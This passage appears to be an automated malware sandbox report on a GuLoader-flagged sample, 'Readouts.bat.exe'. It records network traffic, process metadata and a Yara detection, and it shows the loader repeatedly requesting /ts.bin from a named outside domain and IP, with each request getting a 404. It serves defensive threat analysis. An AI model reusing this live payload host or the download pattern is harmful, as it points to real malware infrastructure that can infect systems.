Nov 25, 2024 07:17:20.110327959 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:20.386229992 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:20.386353016 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:20.587492943 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:20.587573051 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:30.600289106 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:30.719852924 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:30.995959997 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:30.996053934 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:41.006613016 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:41.126204967 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:41.401738882 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:41.401855946 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:41.602890968 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:41.602950096 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:51.617558002 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:51.737179041 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:52.013350010 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:52.013443947 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:02.025445938 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:02.144954920 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:02.420325041 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:02.420488119 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:12.428361893 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:12.547893047 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:12.827399969 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:12.827457905 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:13.028487921 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:13.028589010 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:23.037874937 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:23.157618046 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:23.432622910 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:23.432703018 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:23.633754969 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:23.633871078 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:33.647073984 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:33.766699076 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:34.042136908 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:34.042247057 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:44.053402901 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:44.172857046 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:44.448582888 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:44.448641062 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:18:44.649621010 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:18:44.649720907 CET	49736	80	192.168.2.4	172.93.121.126

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 07:16:36.610707045 CET	60856	53	192.168.2.4	1.1.1.1
Nov 25, 2024 07:16:36.750904083 CET	53	60856	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 07:16:36.610707045 CET	192.168.2.4	1.1.1.1	0xf929	Standard query (0)	kkaou.lamd.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 07:16:36.750904083 CET	1.1.1.1	192.168.2.4	0xf929	No error (0)	kkaou.lamd.shop		172.93.121.126	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

kkaou.lamd.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	172.93.121.126	80	5684	C:\Users\user\Desktop\Readouts.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 07:16:37.501250029 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:16:38.511192083 CET	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:16:24 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding
Nov 25, 2024 07:16:38.755135059 CET	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
Nov 25, 2024 07:16:48.777443886 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:16:49.173536062 CET	506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:16:34 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 25, 2024 07:16:59.178579092 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:16:59.573565006 CET	506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:16:45 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 25, 2024 07:17:09.584342957 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:17:09.979950905 CET	506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:16:55 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 25, 2024 07:17:19.990755081 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:17:20.386229992 CET	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:17:05 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding
Nov 25, 2024 07:17:20.587492943 CET	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
Nov 25, 2024 07:17:30.600289106 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:17:30.995959997 CET	506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:17:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 25, 2024 07:17:41.006613016 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:17:41.401738882 CET	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:17:26 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding
Nov 25, 2024 07:17:41.602890968 CET	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
Nov 25, 2024 07:17:51.617558002 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:17:52.013350010 CET	506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:17:37 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 25, 2024 07:18:02.025445938 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:18:02.420325041 CET	506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:17:47 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 25, 2024 07:18:12.428361893 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:18:12.827399969 CET	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:17:58 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding
Nov 25, 2024 07:18:13.028487921 CET	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
Nov 25, 2024 07:18:23.037874937 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:18:23.432622910 CET	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:18:08 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding
Nov 25, 2024 07:18:23.633754969 CET	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
Nov 25, 2024 07:18:33.647073984 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:18:34.042136908 CET	506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:18:19 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 25, 2024 07:18:44.053402901 CET	166	OUT	GET /ts.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kkaou.lamd.shop Cache-Control: no-cache
Nov 25, 2024 07:18:44.448582888 CET	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 06:18:29 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: keep-alive Vary: Accept-Encoding
Nov 25, 2024 07:18:44.649621010 CET	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t

Target ID:	0
Start time:	01:15:42
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\Readouts.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Readouts.bat.exe"
Imagebase:	0x400000
File size:	993'977 bytes
MD5 hash:	492707A5E753B9C5FAA6A9829E065775
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2169579435.0000000005D35000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:16:29
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\Readouts.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Readouts.bat.exe"
Imagebase:	0x400000
File size:	993'977 bytes
MD5 hash:	492707A5E753B9C5FAA6A9829E065775
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.3529994044.0000000002115000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.1%
Total number of Nodes:	1567
Total number of Limit Nodes:	35

Executed Functions

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

